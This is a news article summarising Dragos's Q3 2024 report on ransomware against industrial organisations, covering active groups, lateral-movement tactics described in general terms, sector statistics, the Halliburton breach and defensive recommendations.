Dragos releases Q3 2024 industrial ransomware report

The Dragos Industrial Ransomware Analysis Report Q3 2024 has revealed that the ransomware threat ecosystem remained highly active, driven by the emergence of new groups, rebranding of existing entities, the expansion of initial access broker (IAB) operations, and the proliferation of illicitly traded tools. Operators also demonstrated a growing ability to adapt to disruptions, leveraging technological advancements and strategic realignments to sustain their operations.

A critical shift occurred this quarter as dominant groups like LockBit faced significant setbacks following coordinated international law enforcement actions, including Operation Cronos, which dismantled key infrastructure components. This led to a decline in LockBit’s activities and forced affiliates, such as Velvet Tempest, to transition to other groups like RansomHub.

The ransomware-as-a-service (RaaS) model continued to mature, relying increasingly on IABs to exploit vulnerabilities, misconfigurations and stolen credentials to facilitate entry into targeted environments. This initial access enabled ransomware groups to scale their operations by focusing on payload deployment and extortion strategies. This industrialisation of ransomware has continuously lowered barriers to entry for new actors, fostering a competitive and dynamic threat environment.

Additionally, geopolitical tensions introduced new dimensions to ransomware threats. The conflicts in the Middle East and Eastern Europe spurred a rise in hacktivist personas using ransomware to disrupt industrial operations. Unlike traditional financially motivated campaigns, these actors appear to prioritise operational sabotage, posing a distinct and potentially catastrophic risk to critical infrastructure.

Emerging ransomware threats

Dragos observed the emergence of several new ransomware groups targeting industrial organisations and exploiting vulnerable remote and virtual network applications through initial access and post-compromise techniques. Notable groups included 3am, APT73, Eldorado, Fog, Helldown, RansomHub and Sarcoma, among others. They employed advanced tactics to compromise operationally critical IT systems, prioritising industries with low tolerance for downtime, such as industrial operations. By targeting environments where disruptions cause cascading impacts, they increased the likelihood of ransom payments, with the urgency of uninterrupted services pressuring victims.

While some groups were entirely new, others, like APT73, appear to be rebranded versions of existing entities, such as remnants of LockBit affiliates. APT73 repurposed familiar techniques while introducing new payloads to evade detection and maintain a foothold in the ransomware ecosystem. This reflects the adaptability and resilience of ransomware operations, as groups continually evolve tactics and infrastructure to remain effective and profitable despite heightened scrutiny from defenders and law enforcement.

Advanced lateral movement and persistence techniques

Dragos observed ransomware groups expanding their lateral movement capabilities by combining traditional methods with advanced persistence mechanisms:

• Living-off-the-land techniques (LOLTs): Actors evaded detection by mimicking legitimate network activity, leveraging legitimate administrative tools like PowerShell, certutil.exe and PsExec.
• Abuse of remote access tools: Tools like AnyDesk and Quick Assist were exploited to establish persistent access, often paired with custom scripts to disable antivirus protection.
• Targeting virtual environments: Groups like Eldorado and Play developed Linux lockers specifically to target VMware ESXi environments, encrypting critical virtual machine files and disabling active VMs, minimising pre-encryption dwell time while disrupting operations.
• Integration of advanced malware: Groups such as Black Basta adopted custom malware, backdoor tools like SilentNight, tunnelling utilities like PortYard, and memory-only droppers like DawnCry to evade endpoint detection and maintain persistence.
   

While no direct attacks on operational technology (OT) assets were observed, ransomware-induced IT downtime often disrupted industrial processes, leading to financial losses, production delays and safety risks. The interconnected nature of IT and OT networks amplified these disruptions.

Dragos assesses with moderate confidence that ransomware activity targeting industrial organisations will continue to escalate, driven by both financially and ideologically motivated actors. The shift towards operational sabotage, particularly by hacktivist personas, compounds these risks and blurs the line between cybercrime and cyberwarfare, which requires stronger defences for ICS and OT environments.

Ransomware impacts on industrial organisations

Ransomware attacks continued to disrupt industrial organisations, causing operational halts, financial losses and compromised data integrity.

In September 2024, oilfield services company Halliburton was breached by a RansomHub-linked threat actor, impacting invoice processing and purchase order management. Halliburton reported a US$35 million financial loss and confirmed unauthorised parties accessed and exfiltrated information from its systems.

Hacktivism and the rise of ransomware-driven operations

Dragos observed an increasing trend of hacktivist groups integrating ransomware into their operations, signalling a significant shift in tactics and impact. Groups like CyberVolk, Handala and KillSec used ransomware to amplify disruption, blurring the lines between ideological activism and financially driven cybercrime.

CyberVolk represents a troubling development. It launched a RaaS platform in June and its proprietary CyberVolk ransomware in July, deploying it in pro-Russian campaigns targeting critical infrastructure. The ransomware combines advanced encryption algorithms with payload delivery methods typically seen in financially motivated attacks. While no direct impacts on industrial organisations were observed, the growing sophistication and focus of groups like CyberVolk is concerning. The convergence of ransomware and ideological motives heightens risks to critical infrastructure, demanding increased vigilance against this evolving threat.

Ransomware by manufacturing sector Q3 2024. ©Dragos Inc.

Regional and industry impacts

Ransomware incidents showed distinct regional variations, with North America experiencing the highest attack volume. Illustrating that ransomware remains a global threat, Oceania reported 12 incidents in the quarter, primarily targeting Australia and New Zealand in the technology, education and healthcare sectors.

The manufacturing sector was the most impacted, with 394 observed incidents accounting for 71% of all ransomware cases. Industrial control systems (ICS) equipment and engineering saw 56 incidents (10%), followed by oil and natural gas with 13 incidents (2%). Water and wastewater entities faced five incidents, while mining reported three.

Additionally, ransomware activity affected 23 unique manufacturing subsectors in Q3, a significant increase from the previous quarter. The rise in incidents underscores ransomware operators’ focus on industries critical to operational continuity and infrastructure.

Ransomware group trends, patterns and observations

Dragos’s analysis revealed significant shifts in ransomware activity, with LockBit3.0, RansomHub and Play emerging as the most active groups targeting industrial organisations.

Many groups showed marked increases in activity, highlighting the dynamic and evolving nature of the ransomware landscape. It remains unclear whether new ransomware groups are entirely new actors or rebranded versions of existing ones.

Conclusion

This quarter highlighted the evolving ransomware threat landscape. RansomHub, LockBit3.0 and Play remained prominent, while new actors exploited vulnerabilities in IT and OT environments. The industrial sector, particularly manufacturing and ICS equipment and engineering, was a key target, with operators leveraging advanced tactics and exploiting weak credential practices and vulnerabilities in remote access systems.

Organisations must prioritise strong cybersecurity measures. Monitoring critical ports, enforcing MFA, maintaining offline backups and securing remote access are essential. Enhanced personnel training and continuous assessment of network architecture are vital to counter evolving threats. As ransomware operations fragment and adapt, proactive defences, intelligence sharing and collaboration are essential to protect critical infrastructure.

Image credit: iStock.com/AndreyPopov